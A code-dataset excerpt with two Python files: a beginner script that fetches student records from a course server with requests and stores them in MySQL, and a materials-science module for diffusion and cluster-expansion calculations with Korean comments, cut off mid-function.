+{"seq_id":"339088357","text":"'''\r\n安���requests模块\r\nrequests模块是模拟浏览器发送一些网络请求的的工具\r\n清楚一个网址的请求模式。get,post\r\n get 请求比较不安全,\r\n post请求专门放到一个安全的区域,然后在传输过去\r\n\r\n'''\r\n# import requests\r\n#\r\n# response=requests.post(url=\"http://www.jasonisoft.cn:8080/HKR/UserServlet?method=findAllStudent\")\r\n#\r\n# response.encoding=\"utf-8\"\r\n# users = response.json()\r\n# eval(users)\r\n# for i in users:\r\n# print(i)\r\nimport requests\r\nimport pymysql\r\n\r\nresponse = requests.post(url=\"http://www.jasonisoft.cn:8080/HKR/UserServlet?method=findAllStudent\",\r\n data={\"username\":\"jason\"})\r\nresponse.encoding = \"utf-8\"\r\nlist1=[]\r\nusers = response.json() #[{age:56},{}]\r\ncon=pymysql.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"requ\")\r\ncursoe=con.cursor()\r\nsql14=\"insert into student (address,age,carte,classname,email,graduation,id,loginname,\" \\\r\n \"phoneNumber,picturePath,registerDate,sex,uid,username) \" \\\r\n \"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\r\nsql13=\"insert into student (address,age,classname,email,graduation,id,loginname,\" \\\r\n \"phoneNumber,picturePath,registerDate,sex,uid,username) \" \\\r\n \"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\r\nlist2=[]\r\nnewlist14=[]\r\nnewlist13=[]\r\nfor user in users:\r\n if len(user.keys())==14:\r\n list14=list(dict(user).values())\r\n newlist14.append(list14)\r\n if len(user.keys())==13:\r\n list13=list(dict(user).values())\r\n newlist13.append(list13)\r\ncursoe.executemany(sql14,newlist14)\r\ncursoe.executemany(sql13,newlist13)\r\ncon.commit()\r\ncursoe.close()\r\ncon.close()\r\n","sub_path":"requ.py","file_name":"requ.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"621106836","text":"# Version 1.9\n\nimport math, copy\nimport numpy as np\nfrom scipy import sparse\nfrom scipy.sparse.linalg import minres\n\n\n\n\n\ndef site_prob(beta, site_ene, pre):\n Pa = np.zeros(len(site_ene))\n Pa = np.exp(-beta*site_ene) / pre\n part_func = np.sum(Pa)\n\n Pa /= part_func\n Pa_sqrt = np.sqrt(Pa)\n return Pa, Pa_sqrt\n\n\n\ndef rates(beta, o_o_ind_list, o_o_elist, site_ene, pre, preT, Pa, Pa_sqrt):\n wab = np.zeros((len(site_ene),len(site_ene)))\n Wab = np.zeros((len(site_ene),len(site_ene)))\n \n for j in range(len(o_o_ind_list)):\n for k in o_o_ind_list[j]:\n wab[j][k] = pre[j] * np.exp(-beta*(o_o_elist[j][k]-site_ene[j])) / preT[j][k]\n Wab[j][k] = (Pa_sqrt[j]) * wab[j][k] * (1/Pa_sqrt[k])\n \n wab[j][j] = -np.sum(wab[j])\n Wab[j][j] = wab[j][j]\n return wab, Wab\n\n\n\ndef get_bvec(o_o_ind_list, Pa_sqrt, wab, transport_vec):\n bvec = np.zeros((len(o_o_ind_list),3))\n \n for j in range(len(o_o_ind_list)):\n for k in o_o_ind_list[j]:\n bvec[j] += Pa_sqrt[j] * wab[j][k] * transport_vec[j][k] \n return bvec\n\n\n\ndef get_eta(o_o_ind_list, Wab, bvec):\n eta = np.zeros((3,len(o_o_ind_list)))\n \n Ilist, Jlist, Vlist = [], [], []\n for j, x in enumerate(o_o_ind_list):\n for k in x:\n Ilist.append(j)\n Jlist.append(k)\n Vlist.append(Wab[j][k])\n Ilist.append(j)\n Jlist.append(j)\n Vlist.append(Wab[j][j])\n \n W = sparse.csr_matrix((Vlist,(Ilist,Jlist)), shape=(len(o_o_ind_list),len(o_o_ind_list)))\n for j in range(3):\n eta[j], info = minres(W, bvec[:,j], x0=np.random.rand(W.shape[0]), tol=1e-8)\n return eta\n\n\n\ndef get_bias(bvec, eta):\n bias = np.zeros((3,3))\n \n for row in range(3):\n for col in range(3):\n for b,e in zip(bvec[:,row],eta[col]):\n bias[row][col] += b*e\n return bias\n\n\n\ndef get_bare(o_o_ind_list, Pa, wab, transport_vec):\n Do= np.zeros((3,3))\n \n for j in range(len(o_o_ind_list)):\n for k in o_o_ind_list[j]:\n Do += 0.5 * Pa[j] * wab[j][k] * np.outer(transport_vec[j][k],transport_vec[j][k]) \n return Do\n\n\n\ndef diffuser(Tlist, beta_list, site_ene, o_o_ind_list, o_o_elist, pre, preT, transport_vec):\n D_T_list = []\n \n for i,T in enumerate(Tlist):\n Pa, Pa_sqrt = site_prob(beta_list[i], site_ene, pre)\n wab, Wab = rates(beta_list[i], o_o_ind_list, o_o_elist, site_ene, pre, preT, Pa, Pa_sqrt)\n bvec = get_bvec(o_o_ind_list, Pa_sqrt, wab, transport_vec)\n eta = get_eta(o_o_ind_list, Wab, bvec)\n bias = get_bias(bvec, eta)\n Do = get_bare(o_o_ind_list, Pa, wab, transport_vec)\n\n D = np.zeros((3,3))\n D = (Do + bias)*1e-8\n D_T_list.append(np.diag(D))\n return D_T_list\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##########\ndef posreader(PosName='POSCAR'):\n# \"\"\"\n# Read the atomic configuration from POSCAR\n#\n# Args:\n# PosName (str): the name of the POSCAR File, (default: 'POSCAR')\n# \"\"\"\n POS = {} #B #Initialize the dictionary for POSCAR information\n Fid = open(PosName,'r')\n \n Line = Fid.readline() \n POS['CellName'] = Line.split('\\n')[0] #B #Comment line #Comment line\n\n Line = Fid.readline()\n Sline = Line.split()\n POS['LattConst'] = float(Sline[0]) #B #Lattice constant #Universal scaling factor (lattice constant)\n \n POS['Base'] = [[0.0]*3 for i in range(3)] #B #Initilize the base list\n for i in range(3): #Three lattice vectors\n Line = Fid.readline()\n Sline = Line.split()\n #@POS['Base'][i] = [float(Sline[i]) for i in range(3)];\n POS['Base'][i] = [float(Sline[i])*POS['LattConst'] for i in range(3)] #!\n\n\n Line = Fid.readline()\n Sline = Line.split()\n POS['EleName'] = Sline #B #The name of each element 
#Name of atomic species\n POS['EleNum']= len(POS['EleName']) #B #number of elements involved #EleNum = 3 (Sr, Ti, O)\n \n Line = Fid.readline()\n Sline = Line.split()\n POS['AtomNum'] = [0]*POS['EleNum']\n POS['AtomSum'] = 0\n for ind, Num in enumerate(Sline):\n POS['AtomNum'][ind] = int(Num) #AtomNum = [32, 32, 96], number of atoms per atomic species\n POS['AtomSum'] += int(Num) #AtomSum = 160, total number of atoms\n\n\n Line = Fid.readline()\n Sline = Line.split()\n FL = Sline[0][0] #B #Check the first letter\n if (FL=='S'): #Selective dynamics\n POS['IsSel'] = 1\n POS['SelMat'] = [['X']*3 for i in range(POS['AtomSum'])]\n Line = Fid.readline()\n Sline = Line.split()\n FL = Sline[0][0] #B #Check the first letter for coord\n else:\n POS['IsSel'] = 0\n\n \n #B # Set up the lattice type \n if (FL=='D') | (FL=='d'): #Direct coordinates\n POS['LatType'] = 'Direct'\n elif (FL=='C') | (FL=='c'): #Cartesian coordinates\n POS['LatType'] = 'Cartesian'\n else:\n print(\"Please check the POSCAR file, the lattice type is not direct or cartesian\")\n \n POS['LattPnt'] = [[0.0]*3 for i in range(POS['AtomSum'])] #B #Initialize lattice points\n\n if (POS['LatType']=='Direct'): #!\n for i in range(POS['AtomSum']): #!\n Line = Fid.readline() #!\n Sline = Line.split() #!\n POS['LattPnt'][i] = [float(Sline[i]) for i in range(3)] #!\n if(POS['IsSel']): #!\n POS['SelMat'][i] = [Sline[i+3] for i in range(3)] #!\n \n elif (POS['LatType']=='Cartesian'): #!\n BaseInv = np.linalg.inv(POS['Base']) #!\n for i in range(POS['AtomSum']): #!\n Line = Fid.readline() #!\n Sline = Line.split() #!\n POS['LattPnt'][i] = [float(Sline[i]) for i in range(3)] #!\n POS['LattPnt'][i] = list(np.dot(BaseInv, POS['LattPnt'][i])) #!\n if(POS['IsSel']): #!\n POS['SelMat'][i] = [Sline[i+3] for i in range(3)] #!\n\n else: #!\n print(\"Please check the POSCAR file, the lattice type is not direct or cartesian\") #!\n \n#@ for i in range(POS['AtomSum']):\n#@ Line = Fid.readline()\n#@ Sline = Line.split()\n#@ POS['LattPnt'][i] = [float(Sline[i]) for i in range(3)] #LattPnt = [0.25, 0.0, 0.125], Direct coordinates\n#@ if(POS['IsSel']):\n#@ POS['SelMat'][i] = [Sline[i+3] for i in range(3)]\n\n Fid.close()\n #B #The current version does not support reading the POSCAR with velocity information!!!!!!!!!!!!!!!!\n return POS\n##########\n\n\n\n\n\n##########\ndef poswriter(PosName,POS):\n# \"\"\"\n# Write out the POS into a POSCAR file\n#\n# Args:\n# PosName: the name of the POSCAR file\n# POS: the POS dictionary\n# \"\"\"\n Fid = open(PosName,'w')\n Fid.write('%s ' %POS['CellName'])\n Fid.write('\\n')\n \n Fid.write('%f \\n' %POS['LattConst']) \n for i in range(3):\n Fid.write('%f %f %f \\n' %(POS['Base'][i][0], POS['Base'][i][1], POS['Base'][i][2]))\n\n for i in range(POS['EleNum']):\n Fid.write('%s ' %POS['EleName'][i])\n Fid.write('\\n')\n\n for i in range(POS['EleNum']):\n Fid.write('%i ' %POS['AtomNum'][i])\n Fid.write('\\n')\n \n if (POS['IsSel']):\n Fid.write('Selective Dynamics \\n')\n\n Fid.write('%s \\n' %POS['LatType'])\n for i in range(POS['AtomSum']):\n Fid.write('%f %f %f ' %(POS['LattPnt'][i][0], POS['LattPnt'][i][1], POS['LattPnt'][i][2]))\n if (POS['IsSel']):\n Fid.write('%s %s %s ' %(POS['SelMat'][i][0], POS['SelMat'][i][1], POS['SelMat'][i][2]))\n Fid.write('\\n')\n \n Fid.close()\n##########\n\n\n\n\n\n##########\ndef dismatcreate(POS):\n# \"\"\"\n# Create the distance matrix for a given POS\n#\n# Args:\n# POS: the POS dictionary\n# \"\"\"\n POS['dismat'] = [[0.0]*POS['AtomSum'] for i in range(POS['AtomSum'])]\n \n for 
AtomInd1, Pnt1 in enumerate(POS['LattPnt']):\n for AtomInd2, Pnt2 in enumerate(POS['LattPnt']):\n Pnt1=np.array(Pnt1)\n Pnt2=np.array(Pnt2)\n PntDis = Pnt1 - Pnt2\n \n for i in range(3):\n if (PntDis[i]>0.5):\n PntDis[i] = 1 - PntDis[i]\n elif (PntDis[i]<-0.5):\n PntDis[i] = PntDis[i] + 1\n elif (PntDis[i]>=-0.5) & (PntDis[i]<=0.5):\n PntDis[i] = abs(PntDis[i])\n else:\n print(\"Something is wrong when calculating dist matrix\")\n \n PntDis = np.dot(PntDis, POS['Base'])\n POS['dismat'][AtomInd1][AtomInd2] = math.sqrt(PntDis[0]**2 + PntDis[1]**2 + PntDis[2]**2)\n \n return POS\n##########\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##########\ndef findGrpLst(Lst):\n# \"\"\"\n# Group the lst\n# \"\"\"\n\n #Lst=[1,1] -> GrpLst=[[0,1]]\n #Lst=[1,2] -> GrpLst=[[0],[1]]\n #Lst=[1,1,2] -> GrpLst=[[0,1],[2]]\n #Lst=[1,2,2] -> GrpLst=[[0],[1,2]]\n #Lst=[1,2,1] -> GrpLst=[[0],[1],[2]]\n \n GrpLst = [[0]]\n Loc = 0\n NLst = len(Lst)\n for Ind in range(1,NLst):\n #B #print Lst[Ind], Lst[Ind - 1];\n if Lst[Ind] == Lst[Ind - 1]: #Lst의 숫자가 그 전 숫자와 같으면\n GrpLst[Loc].append(Ind) #같은 []에 숫자를 추가. [0,1,..]\n else: \n Loc += 1 \n GrpLst.append([]) #다르면\n GrpLst[Loc].append(Ind) #다음 []에 숫자를 추가. [0],[1],..\n return GrpLst\n##########\n \n\n\n\n\n##########\ndef grporderPermute(Lst, GrpLst):\n# '''\n# Find the permution of group list\n#\n# Args:\n# Lst: The original list, somthing like [1,100,1000]\n# GrpLst: the list of group of Lst, something like [[0,1],2]\n# '''\n \n #Lst=[1,1] -> GrpLst=[[0,1]] -> PermuteGrpLst=[[0]]\n #Lst=[1,2] -> GrpLst=[[0],[1]] -> PermuteGrpLst=[]\n #Lst=[1,1,2] -> GrpLst=[[0,1],[2]] -> PermuteGrpLst=[[0],[1,2]]\n #Lst=[1,2,2] -> GrpLst=[[0],[1,2]] -> PermuteGrpLst=[[0,1],[2]]\n #Lst=[1,2,1] -> GrpLst=[[0],[1],[2]] -> PermuteGrpLst=[]\n \n LstLen = len(Lst) #Lst=[1,1,2] 일 때,\n GrpLen = len(GrpLst) #GrpLst=[[0,1],[2]]\n PermuteGrp = [] #LstLen = 3\n flag = 0 #GrpLen = 2\n \n for GrpInd1, Grp1 in enumerate(GrpLst): #GrpLst=[[0,1],[2]]\n for GrpInd2 in range(GrpInd1,GrpLen):\n Grp2 = GrpLst[GrpInd2]\n PermuteGrp.append([])\n for i in Grp1: # i:[0,1] / j:[0,1],[2] -> (0,0),(0,1),(1,0),(1,1) / (0,2),(1,2)\n for j in Grp2: # j: [2] / j: [2] -> (2,2)\n PermuteGrp[flag].append((i,j)) \n if len(PermuteGrp[flag]) == 1: #B #Should have at least 1 item\n PermuteGrp.remove(PermuteGrp[flag]) # 이 중, (2,2)과 같이 한 개 뿐인 것 제거함\n else:\n flag += 1 #PermuteGrp = [ [(0,0),(0,1),(1,0),(1,1)], [(0,2),(1,2)]]\n \n PermuteGrpLst = [[] for i in range(len(PermuteGrp))]\n PermuteLst = [[] for i in range(len(PermuteGrp))]\n \n Count = 0\n for i in range(LstLen): #PermuteGrp에서 (i,j)가 몇 번째에 있는지\n for j in range(i+1,LstLen): #(i,j) = (0,1) -> (0,2) -> (1,2) -> (2,2)\n for PInd,Permute in enumerate(PermuteGrp): #Count: 0 1 2 x\n if (i,j) in Permute: #PermuteGrp:0 1 1\n PermuteGrpLst[PInd].append(Count) #PermuteGrpLst = [ [ 0 ], [ 1 , 2 ] ]\n PermuteLst[PInd].append((i,j)) #PermuteLst = [ [(0,1)], [(0,2),(1,2)] ]\n break\n Count += 1\n \n return PermuteGrpLst\n##########\n \n\n\n\n\n##########\ndef grpSort(Lst, GrpLst): \n# \"\"\"\n# Sort the Lst with certain group constaint\n# \"\"\"\n Lst0 = list(Lst)\n for Grp in GrpLst:\n if len(Grp) <= 1: #Grp=[0]\n continue #Grp가 한개면 그냥 넘어감\n \n else: #Grp=[0,1]\n SubLst = sorted([Lst0[i] for i in Grp]) #Grp가 두개 이상이면, 여기에 해당하는 Lst를 작은 순서부터 정렬\n for i, ind in enumerate(Grp): #Lst=[20,10,30] -> [10,20,30]\n Lst0[ind] = SubLst[i]\n return Lst0\n##########\n \n\n\n\n\n##########\ndef lstGrpAdd(Lst, MaxVal, GrpLst): \n# \"\"\"\n# Add one into the lst, this operation is used to when we 
iterate all the\n# combinations with candidate in Lst variable. In this case, the function\n# would call the next combination, the list would also be ordered in this\n# case, which means [1,2,3] is treated the same as [2,3,1] and [3,2,1].\n#\n# Args:\n# Lst: The Lst to be operated, should consist only integers, the minimum\n# of each candidate is 0, while the maximum is MaxVal\n# MaxVal: Maximum value of integers expected in each Lst element\n# \"\"\"\n\n #MaxVal=[7,7,91], GrpLst=[[0,1],[2]] 일 때,\n #Lst=[0,0,0] -> [1,0,0] -> ... -> [7,0,0]\n # [1,1,0] -> [2,1,0] -> ... -> [7,1,0]\n # [2,2,0] -> [3,2,0] -> ... -> [7,2,0] -> ... [7,7,91]\n #이런 식으로 중복되는 것 없이 리스트를 만듬\n\n LstLen = len(Lst)\n if (Lst[0] < MaxVal[0]): #Lst의 첫번째 수\n Lst[0]+=1 #Lst=[0,0,0] -> [1,0,0] -> ... -> [7,0,0] \n\n \n elif (Lst[0] == MaxVal[0]): #Lst의 첫번째 수가 MaxVal에 도달했으면\n NotFullInd = LstLen - 1 \n\n for i in range(1,LstLen): #Lst 중 MaxVal에 도달하지 못한 첫번째 index 찾아서 1을 더함\n if (Lst[i] != MaxVal[i]):\n NotFullInd = i \n break #NotFullInd=1\n Lst[NotFullInd] += 1 #Lst=[7,0,0] -> [7,1,0]\n \n #B #Find the belonging group of NotFullInd\n for GrpInd, Grp in enumerate(GrpLst): \n if NotFullInd in Grp: \n ChgInd=GrpInd \n break\n \n for i in range(NotFullInd):\n if i in GrpLst[ChgInd]: #NotFullInd=1가 Grp=[0,1]에 있다면, Lst의 앞 숫자에 뒤 숫자를 넣음\n Lst[i] = Lst[NotFullInd] #Lst=[7,1,0] -> [1,1,0]\n else: #NotFullInd=2가 Grp=[2]에 있다면, Lst의 앞 숫자에 0을 넣음\n Lst[i] = 0 #Lst=[7,7,1] -> [0,0,1]\n return Lst\n##########\n\n\n\n\n\n##########\ndef lstOrderAdd(Lst, MaxVal):\n# \"\"\"\n# Add one into the lst, this operation is used to when we iterate all the\n# combinations with candidate in Lst variable. In this case, the function\n# would call the next combination, the list would also be ordered in this\n# case, which means [1,2,3] is treated the same as [2,3,1] and [3,2,1].\n#\n# Args:\n# Lst: The Lst to be operated, should consist only integers, the minimum\n# of each candidate is 0, while the maximum is MaxVal\n# MaxVal: Maximum value of integers expected in each Lst element\n# \"\"\"\n \n LstLen = len(Lst)\n \n if (Lst[0] < MaxVal[0]):\n Lst[0]+=1\n \n elif (Lst[0] == MaxVal[0]):\n NotFullInd = LstLen - 1\n \n for i in range(1,LstLen):\n if (Lst[i] != MaxVal[i]):\n NotFullInd = i\n break \n Lst[NotFullInd] += 1\n \n for i in range(NotFullInd):\n Lst[i] = Lst[NotFullInd]\n\n return Lst\n##########\n\n\n\n\n\n##########\ndef listPermute(Lst):\n# '''\n# Create permution with the consideration of degree of freedom\n# '''\n \n #[2,3] -> [2],[3]\n #[2,3],[2,3] -> [2,2],[3,2],[3,3]\n #[2,3],[4,5] -> [2,4],[3,4],[2,5],[3,5]\n\n PermuteLst = []\n Lstlen = len(Lst)\n LstItemInd = [0]*Lstlen\n MaxItemInd = [0]*Lstlen\n \n for Ind, LstItem in enumerate(Lst):\n MaxItemInd[Ind] = len(LstItem) - 1\n\n GrpLst = findGrpLst(Lst)\n while (LstItemInd[-1]<=MaxItemInd[-1]):\n ItemLst = []\n for i, Ind in enumerate(LstItemInd):\n ItemLst.append(Lst[i][Ind])\n PermuteLst.append(ItemLst)\n LstItemInd = lstGrpAdd(LstItemInd, MaxItemInd, GrpLst)\n \n return PermuteLst\n##########\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##########\n#@def ceFind(SubLatt, POSRef, NCut=3, Isprint=0, DCut='default'):\ndef ceFind(SubLatt, POSRef, NCut, DCut, Isprint=0): #!\n# '''\n# Method to find the clusters with a given reference lattice\n#\n# Args:\n# SubLatt: the projection of solid solution into reference lattice\n# something like [[0,1],[1,2],[3,4]];\n# POSRef: POSCAR dictionary for reference lattice\n# NCut: Cutoff size of clusters (default: 3)\n# DCut: Cutoff length of each dimension of 
the cluster \n# (default: Half of the box size)\n# '''\n\n    #@print('#############################################################')\n    if DCut == 'default':\n        DCut = 100.0\n        TS = 0.3\n        for i in range(3):\n            DMax = max(POSRef['Base'][i])/2.0 + TS\n            if DMax < DCut:\n                DCut = DMax\n    #@print('Cutoff cluster length is %f A' %DCut)\n\n    NSubLatt = POSRef['EleNum'] #NSubLatt=3, (A,B,O three sublattices)\n    ClusterDesLst = []\n    PrimDistLst = []\n    AllPrimLattLst = []\n    ClusterNum = []\n    IndMax = max(SubLatt[-1]) #SubLatt=[[0],[1,2],[3,4]] -> IndMax=4\n\n    FreeSubLatt = []\n    FreePrim = []\n    for i in range(NSubLatt): #SubLatt = [ [0], [1,2], [3,4]]\n        if len(SubLatt[i]) == 1: #!\n            FreeSubLatt.append(SubLatt[i][0:-1]) #!\n        if len(SubLatt[i]) > 1: # 0 1 2\n            FreePrim.append(i) #FreePrim = [ 1 , 2 ]\n            FreeSubLatt.append(SubLatt[i]) #!\n            #@FreeSubLatt.append(SubLatt[i][0:-1]) #B #Get rid of last one #FreeSubLatt = [ [], [1] , [3] ]\n\n    NFreePrim = len(FreePrim)\n    NFreeSubLatt = len(FreeSubLatt)\n    FreePrim = np.array(FreePrim) #NFreePrim=2\n    FreeSubLatt = np.array(FreeSubLatt) #NFreeSubLatt=3\n    #B #print(NFreePrim,NFreeSubLatt,FreePrim,FreeSubLatt);\n\n    for N in range(2,NCut+1): #clusters made of two or more atoms\n        PrimIndLst = [0]*N\n        PrimDistLst.append([])\n        AllPrimLattLst.append([])\n        while (PrimIndLst[-1]<=NFreePrim-1): #PrimIndLst=[0,0]->[1,0]->[1,1]\n            #B #print(PrimIndLst);\n            PrimLattLst = list(FreePrim[PrimIndLst]) #PrimLattLst=[1,1]->[2,1]->[2,2]\n            AllPrimLattLst[N-2].append(PrimLattLst) #AllPrimLattLst=[[1,1],[2,1],[2,2]]\n                                                    # =[[1,1,1],[2,1,1],[2,2,1],[2,2,2]]\n            DistLst = findCluster(POSRef,PrimLattLst,DCut)\n\n            PrimDistLst[N-2].append(DistLst) #PrimDistLst=[ distances for [1,1], [2,1], [2,2] ]\n            PrimIndLst=lstOrderAdd(PrimIndLst,[NFreePrim-1]*N) # =[ distances for [1,1,1],[2,1,1],[2,2,1],[2,2,2] ]\n\n    #@print('The Distance list of primary lattice is '+str(PrimDistLst))\n    #@print('The cluster made from primary lattice is '+str(AllPrimLattLst))\n\n    ClusterDesLst.append([])\n    ClusterNum.append(0)\n    for SubLatt in FreeSubLatt: #clusters made of a single atom\n        if SubLatt:\n            #@print(SubLatt)\n            for Latt in SubLatt:\n                #@ClusterDesLst[0].append([Latt]) #ClusterDesLst[0]=[[1],[3]]\n                ClusterDesLst[0].append([[Latt]]) #!\n                ClusterNum[0] += 1 #ClusterNum[0]=2\n    #B #print(ClusterDesLst);\n\n    for N in range(2,NCut+1): #clusters made of two or more atoms\n        IndLst = [0]*N\n        ClusterDesLst.append([])\n        ClusterNum.append(0)\n\n        while (IndLst[-1]<=NFreeSubLatt-1):\n            LattLst = list(FreeSubLatt[IndLst]) #LattLst=[ [], []]->[[1], []]->[[3], []]-> =[[1],[1]]->[[3],[1]]->[[3],[3]]->\n            if not [] in LattLst: # = ... -> [[1],[1],[1]] -> ...\n                #B #print('LattLst = '+str(LattLst));\n                PrimLattLst = [0]*N\n                for LattInd, Latt in enumerate(LattLst):\n                    if Latt in list(FreeSubLatt):\n                        SubInd = list(FreeSubLatt).index(Latt)\n                        PrimLattLst[LattInd] = SubInd #LattLst=[[1],[1]] -> PrimLattLst=[1,1]\n                    else:\n                        print('Cannot find Latt in FreeSubLatt!!!')\n                #@print('PrimLattLst = '+str(PrimLattLst))\n\n                if PrimLattLst in AllPrimLattLst[N-2]:\n                    PrimInd = AllPrimLattLst[N-2].index(PrimLattLst)\n                    DistLst = PrimDistLst[N-2][PrimInd] #DistLst: distance info corresponding to LattLst\n                else:\n                    print('Cannot find the relevant PrimLattLst!!!')\n                    break\n\n                for Dist in DistLst: #combine LattLst and DistLst to build Clusters\n                    PermuteLattLst = listPermute(LattLst)\n                    for PermuteLst in PermuteLattLst:\n                        Dist = [round(elem,2) for elem in Dist] #!\n                        Cluster = [PermuteLst,Dist]\n                        if not Cluster in ClusterDesLst[N-2]:\n                            ClusterDesLst[N-1].append(Cluster)\n                            ClusterNum[N-1] += 1\n\n            IndLst = lstOrderAdd(IndLst,[NFreeSubLatt-1]*N) #B #Next one\n    ClusterSum = sum(ClusterNum)\n    #@print('#############################################################')\n\n    if (Isprint):\n        #@print('#############################################################')\n        print('%i independent Clusters have been found in this structure' %(ClusterSum))\n        for N in range(1,NCut+1):\n            print('%i Clusters with %i atoms are given below:' %(ClusterNum[N-1], N))\n            ClusterStr = ''\n            for Cluster in ClusterDesLst[N-1]:\n                ClusterStr+=str(Cluster)\n                #@ClusterStr+='\\t'\n                ClusterStr+='\\n' #!\n            print(ClusterStr)\n        #@print('#############################################################')\n\n    return ClusterSum, ClusterNum, ClusterDesLst\n##########\n\n\n\n\n##########\ndef findCluster(POSRef, LattLst, DCut):\n# '''\n# Find the Distance Lst for a given PrimAtomLst\n#\n# Args:\n#     POSRef: dictionary of POSRef\n#     PrimAtomLst: atom list in PrimAtomLst\n#     DCut: Cutoff distance of the cluster\n# '''\n\n    NLst = len(LattLst) #e.g. LattLst = [2,1], i.e. [O,B]\n    IndLst = [0]*NLst #IndLst = [0,0] -> [1,0] -> ... -> [95,0] ->\n    GIndLst = [0]*NLst #         [1,1] -> ... -> [95,1] ->\n    #@TS = 0.05*NLst\n    TS = 0.1 #!\n    DistLst = []\n    IndLstMax = []\n\n    for i in range(NLst):\n        IndLstMax.append(POSRef['AtomNum'][LattLst[i]]-1) #IndLstMax = [95,31], atom count of each LattLst entry minus 1\n\n    while (IndLst[-1]<=IndLstMax[-1]):\n        for i, Ind in enumerate(IndLst):\n            #@Indtmp = LattLst[i] - 1\n            Indtmp = LattLst[i] #!\n            GIndLst[i] = Ind + sum(POSRef['AtomNum'][0:Indtmp]) #GIndLst = [64,32] -> [65,32] -> ...\n\n        Dist = []\n        #@GrpLst = MathKit.findGrpLst(LattLst)\n        for i in range(NLst):\n            for j in range(i+1,NLst):\n                Distmp = POSRef['dismat'][GIndLst[i]][GIndLst[j]]\n                Dist.append(Distmp)\n\n        GrpLst = findGrpLst(LattLst) #!\n        PermuteGrpLst = grporderPermute(LattLst,GrpLst)\n        Dist = grpSort(Dist,PermuteGrpLst)\n\n        flag = 1\n        for Disttmp in DistLst:\n            Distmp = grpSort(Disttmp,PermuteGrpLst)\n            #@DistDiff = sum(abs(np.array(Dist)-np.array(Disttmp)))\n            DistDiff = sum(abs(np.array(Dist)-np.array(Distmp))) #!\n            if (DistDiff < TS):\n                flag = 0\n        if (min(Dist) > 0) & (max(Dist) < DCut) & flag:\n            DistLst.append(Dist)\n\n        #@GrpLst = MathKit.findGrpLst(LattLst)\n        IndLst = lstGrpAdd(IndLst,IndLstMax,GrpLst)\n\n    return DistLst\n##########\n\n\n\n\n##########\n#@def clustercount1(Clusterdes, POS, TS=0.2):\ndef clustercount1(Clusterdes, POS, TS=0.1):\n# '''\n# enumerate and count clusters in a given lattice, this version is cleaner\n# and more robust than the method below: clustercount\n#\n# Args:\n#     Clusterdes: Cluster description, in the format of list, something\n#         like [[[0,1,2],[2.6,2.7,2.8]],[[1,1],[2.5]],[[2]]]\n#     POS: Dictionary containing the position information, in the format of POSCAR\n#     TS: Allowed variation of cluster bond length\n# Outputs: ClusterLst, which is a list with all the description of identified\n#     clusters as specified in Clusterdes\n# '''\n\n    #                 Sr     Fe           O\n    # ClusterDes = [ [[1]], [[1,2],[2.0]], [[1,1,2],[3.9,2.1,1.9]] ]\n\n    ClusterNum = len(Clusterdes)\n    ClusterLst = [[] for i in range(ClusterNum)]\n    SumLst = [sum(POS['AtomNum'][0:i]) for i in range(POS['EleNum'])] #SumLst = [0,32,40,132] (starting index of each element)\n\n    for CInd, Cluster in enumerate(Clusterdes):\n        CSize = len(Cluster[0]) #B #Cluster Size\n\n        if CSize == 1: #same as clustercount\n            for i in range(POS['AtomNum'][Cluster[0][0]]):\n                GInd = i + sum(POS['AtomNum'][0:Cluster[0][0]])\n                ClusterLst[CInd].append([GInd])\n\n        else: #improved over clustercount from here on\n            IndLst = [0]*CSize #e.g. when Cluster = [[1,1,2],[3.9,2.1,1.9]]\n            IndLstMax = []\n            GIndLst = [0]*CSize\n            GrpLst = findGrpLst(Cluster[0]) #GrpLst = [[0,1],[2]]\n            PermuteLst = grporderPermute(Cluster[0],GrpLst) #PermuteLst = [[0],[1,2]]\n            DistRef = grpSort(Cluster[1],PermuteLst) #DistRef = [3.9,1.9,2.1]\n\n            for Ele in Cluster[0]:\n                IndLstMax.append(POS['AtomNum'][Ele] - 1) #IndLstMax = [7,7,91] (atom count of each element in the cluster, minus 1)\n\n            if -1 in IndLstMax: #!\n                continue #!\n\n            while (IndLst[-1] <= IndLstMax[-1]):\n\n                for i, Ind in enumerate(IndLst):\n                    GIndLst[i] = Ind + SumLst[Cluster[0][i]] #GIndLst = [32,32,40] -> [33,32,40] -> ...\n\n                Dist = []\n                for i in range(CSize): #distances between the atoms in GIndLst\n                    for j in range(i+1,CSize):\n                        Dist.append(POS['dismat'][GIndLst[i]][GIndLst[j]])\n\n                flag = 1\n                Dist = grpSort(Dist,PermuteLst)\n                for Dind,D in enumerate(Dist):\n                    if abs(D - DistRef[Dind]) > TS: #|interatomic distance - reference| > TS\n                        flag = 0\n                        break\n                if flag:\n                    ClusterLst[CInd].append(list(GIndLst))\n\n                lstGrpAdd(IndLst,IndLstMax,GrpLst) #IndLst = [0,0,0] -> [1,0,0] -> ...\n\n    return ClusterLst\n##########\n\n\n\n\n##########\ndef countCluster(ClusterLst):\n    ClusterCount = []\n    for i in range(len(ClusterLst)):\n        #B #print('ClusterLst='+str(ClusterLst[i]))\n        ClusterCount.append(len(ClusterLst[i])) #count the clusters of each type in ClusterLst\n    return ClusterCount\n##########\n\n\n\n\n##########\ndef clusterE(ClusterLst, ClusterCoef):\n# '''\n# Calculate total energy\n#\n# Args:\n#     ClusterLst: List of identified clusters\n#     ClusterCoef: ECI of each cluster\n# '''\n\n    #B #ClusterCount = [];\n    #B #for i in range(len(ClusterLst)):\n    #B #    ClusterCount.append(len(ClusterLst[i]));\n    ClusterCount = countCluster(ClusterLst);\n    #B #print ClusterCount,ClusterCoef, len(ClusterCount), len(ClusterCoef);\n\n    ECE = 0.0;\n    ECE = ECE + ClusterCoef[0]; #ClusterCoef[0]: constant\n    #B #print ECE;\n    for i in range(len(ClusterCount)):\n        ECE = ECE + ClusterCount[i]*ClusterCoef[i+1];\n    #B #print ECE\n    return ECE\n##########\n\n\n\n\n##########\ndef dismatswap(dismat, Ind1, Ind2): #dismat: distances between all atoms, 